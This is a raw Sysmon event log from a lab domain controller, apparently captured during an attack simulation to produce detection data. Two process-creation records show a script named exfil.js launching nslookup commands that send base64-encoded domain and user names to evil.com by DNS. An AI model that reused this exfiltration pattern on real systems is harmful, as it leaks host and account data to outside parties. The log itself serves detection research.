10341000x8000000000000000196219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.069{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A33E-000000005F02}5980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.069{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A33E-000000005F02}5980C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.069{2E1864BB-17AF-629A-A33E-000000005F02}59808028C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-A23E-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.037{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A33E-000000005F02}5980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.022{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.022{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.022{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A23E-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.022{2E1864BB-17A1-629A-783D-000000005F02}55525384C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-A23E-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.035{2E1864BB-17AF-629A-A23E-000000005F02}7584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcuotw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.022{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwcsbp.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043918Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:12.621{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52322-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043917Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:15.182{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E2E1733BF54E19A5E534953F04F5AC2,SHA256=5A0AB40BB8A5F32FE082B26382ECEFA828BE9776E9E1468F8C99C2D306C222CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.926{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-D03E-000000005F02}7660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.926{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-D03E-000000005F02}7660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.926{2E1864BB-17B0-629A-D03E-000000005F02}76604552C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CF3E-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-D03E-000000005F02}7660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000196614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.277{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52349- 354300x8000000000000000196613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.277{00000000-0000-0000-0000-000000000000}7576<unknown process>-udptruefalse127.0.0.1-52349-false127.0.0.1-53domain 10341000x8000000000000000196612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CF3E-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.905{2E1864BB-17A1-629A-783D-000000005F02}55524932C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-CF3E-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.906{2E1864BB-17B0-629A-CF3E-000000005F02}7396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlucf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.889{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhovqp.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.858{2E1864BB-17B0-629A-CD3E-000000005F02}40124572C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.827{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 